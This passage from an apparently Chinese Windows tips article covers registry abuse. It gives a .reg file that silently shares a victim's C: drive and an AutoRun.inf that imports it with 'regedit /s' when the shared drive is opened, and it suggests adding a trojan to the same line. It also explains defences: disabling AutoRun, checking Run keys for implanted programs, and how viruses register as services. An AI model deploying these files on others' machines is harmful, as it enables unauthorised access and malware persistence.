REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionNetworkLanmanC$]
#p#副标题#e#
//这里我只共享了C盘,需要的可以再加
"Path"="C:"
"Remark"=" "
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
然后另存为ShareDrives.reg文件。 再打开记事本,键入以下内容:
[AutoRun]
open=regedit /s ShareDrives.reg // 这里/s参数作用是导入注册表信息不显示任何提示
再另存为AutoRun.inf文件。
将这两个文件复制到对方共享出来的驱动盘根目录下,此后只要双击共享出来的驱动盘就会自动将ShareDrives.reg文件导入注册表,对方重启系统后C盘也就共享出来了。试想想,我们如果在"open=…"句后添上木马名并将已配置好的木马服务端一起复制过去,以后会怎样?
那么如何对付这种攻击呢?因为硬盘根目录下基本不需要AutoRun.inf文件来运行程序,因此我们可以采用一个一劳永逸的办法就是将硬盘的AutoRun功能完全关闭,这样即使硬盘根目录下有AutoRun.inf文件,操作系统也不会运行指定的程序。Win98为例,打开注册表编辑器,找到[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]主键,在注册表编辑器右侧框中可以看到有二进制值"NoDriveTypeAutoRun",最后只需要将其数据数值由默认的"950000 00"改为"9d 00 00 00"就可以了。其原理我就不在讲解了。
3、启动黑客程序
利用注册表启动黑客程序,目的是想每次开机启动时自动运行黑客程序,这同时也是很多木马病毒自启动常用的方法之一。普遍的方法是在将黑客程序名及参数添加到注册表相应的键值下,这样一来,每次开机时计算机将自动加载相应的注册表项,进而使黑客程序达到常驻内存的目的。另外还有更为隐蔽的方法会在"注册表与木马病毒"部分详细介绍。
下面我们打开注册表编辑器,查看:
HKEY_LOCAL_MACHINESoftwareMicrosoft
WindowsCurrentVersion下所有以"run"开头的键值;
HKEY_CURRENT_USERSoftwareMicrosoft
WindowsCurrentVersion下所有以"run"开头的键值;
HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"开头的键值。
如果发现未知不明的键值,可很有可能就是非法植入的程序。
二、注册表与病毒
下面我们来看看病毒是如何利用注册表的。一般,病毒会利用注册表来得到系统的基本信息,例如操作系统类型、系统安装的服务程序、IE、outlook等应用软件的版本信息等等。这主要是为了探测系统及软件本身的漏洞然后加以利用。更主要的,病毒是想通过注册表实现黑客程序一样的目的——开机自启,常驻内存。只有这样,病毒才能感染其他机器和文件,才有机会进行"破坏"。
打开注册表编辑器,我们找到:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以"run"开头的键值;
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以"run"开头的键值;
HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"开头的键值。
大部分病毒都会悄悄的在上述三个位置安家。这时我们只需要删除相应的键值再删除掉病毒程序就可以了。
此外,病毒还可以把自己注册为系统服务来达到更为隐蔽的开机自启的目的。其基本原理是利用在WIN2K中,"启动类型"设置为"自动"的服务,启动时系统就会自动运行,所以,病毒只需将自身添加到系统服务中,并将"启动类型"设置为"自动"就可以每次启动系统时都自动运行病毒程序。其在注册表中的位置如下:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServiceNamemeters]
"Application"= "C:winntsystem32 ServiceName.exe
关键词标签:注册表
相关阅读
热门文章 windows7虚拟光驱安装和使用方法解决应用程序正常初始化(0xc0000135)失败hosts文件位置以及如何修改hosts文件[声音故障]XP没有声音,丢失Windows Audi
人气排行 [声音故障]XP没有声音,丢失Windows Audio服务(AudioSrv)[警解决Windows 7黑屏的有效方法windows2003中关于软路由设置方法的具体介绍Windows不能在本地计算机启动OracleDBConsoleorcl一个空文件夹删不掉的解决办法Windows 7加XP的局域网搭建与文件共享用Windows命令行实现自动SSH代理Windows提示错误应用程序update.exe
查看所有0条评论>>